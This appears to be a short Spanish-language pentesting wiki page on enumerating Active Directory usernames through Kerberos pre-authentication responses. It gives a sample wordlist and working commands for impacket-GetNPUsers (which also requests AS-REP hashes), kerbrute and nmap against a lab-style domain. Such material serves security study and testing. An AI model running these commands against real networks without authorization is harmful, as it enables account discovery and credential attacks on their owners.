Enumeración de usuarios Kerberos
Descripción
La enumeración de usuarios en Kerberos consiste en hacer fuerza bruta al Active Directory mediante un diccionario de usuarios.
Para enumerar los usuario de Kerberos se envía una solicitud TGT sin pre-autenticación Si el KDC responde con el error KDC_ERR_C_PRINCIPAL_UNKNOWN
, el nombre de usuario no existe. Sin embargo, si el KDC solicita pre-autenticación, sabemos que el nombre de usuario existe.
Esto no causa ningún error de inicio de sesión, por lo que no bloqueará la cuenta.
Para llevar a cabo la enumeración de usuarios en Kerberos se pueden utilizar las siguientes herramientas:
Impacket-GetNPUsers
Kerbrute
Nmap
La lista de usuarios para la enumeración tiene que tener el siguiente formato:
iwolf
papa
administrator
danj
adamb
alans
chrisn
...
Impacket-GetNPUsers
impacket-GetNPUsers atlanta.corp/ -usersfile /home/iwolf/Desktop/users.txt -dc-ip 10.0.0.128 -request

Kerbrute
./kerbrute userenum --dc 10.0.0.128 -d atlanta.corp /home/iwolf/Desktop/users.txt

Nmap
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='atlanta.corp',userdb=/home/iwolf/Desktop/users.txt 10.0.0.128 -Pn

Referencias
Last updated